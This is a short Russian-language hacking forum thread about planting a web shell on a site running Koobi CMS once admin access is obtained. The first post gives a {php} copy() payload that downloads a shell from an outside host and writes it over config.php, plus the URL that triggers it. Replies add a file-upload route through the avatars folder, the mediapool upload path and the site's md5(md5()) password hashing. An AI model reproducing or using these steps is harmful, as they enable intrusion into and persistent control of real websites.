|
заливка шела через Koobi CMS
получив доступ к админке движка Koobi CMS я задался вопросом как же все таки залить шел на сервер, поиск в гугле абсолютно ничего дал. я решил сам изучить админку и через пол часа я уже лазил по серваку, как говорится "все гениальное-просто"
заходим в админку http://www.saitik.com/admin/admin.php и на администраторской панели выбираем Статические страницы>Создать документ заполняем появившуюся форму Категория -- необязательно Название -- shell Имя документа -- shell текст документа Код:
{php} copy('http://hakersite.net/shel.txt','/home/public_html/saitik.com/config.php'); {/php}http://hakersite.net/shel.txt - путь до шела в текстовом файле /home/public_html/saitik.com/config.php - путь для записи шела /* может быть и таким ./config.php , если прав хватит*/ теперь нужно заставить сервер выполнить эту команду http://www.saitik.com/index.php?area=1&p=static&page=shell ну вот и все в принципе, можем с чистой совестью зайти на шел http://www.saitik.com/config.php зЫ: удачи в хаке! |
хм... а если папка /static/ закрыта на запись?
Тогда поступаем так: в админке выбераем меню: Файлы->Добавить файл в архив сайта там нажимаем кнопку "Медиа каталог" или "Каталог загрузок", на открывшейся странице выбираем папку "avatars", нажимаем "Загрузка файлов" - загружаем шелл типа shell.php. При Удачном раскладе(если файл загрузки не фильтрует файлы php) шелл будет доступен по адресу: http://site/uploads/avatars/shell.php ЗЫ: в случае заливки шелла способом, представленным vp$ лучше заменить Код:
{php} copy('http://hakersite.net/shel.txt','/home/public_html/saitik.com/config.php'); {/php}Код:
{php} copy('http://hakersite.net/shel.txt','/home/public_html/saitik.com/uploads/avatars/config.php'); {/php} |
Dr.Frank, как-то ты запутано написал.. =\ я хз, туда попал, где ты говорил (язык не совcем RU or ENG) но одним словом открываем /admin/mediapool.php?typ=bild&target=images и грузим свое добро.
напомню, что хешируется пасс md5(md5()). |
| Время: 01:27 |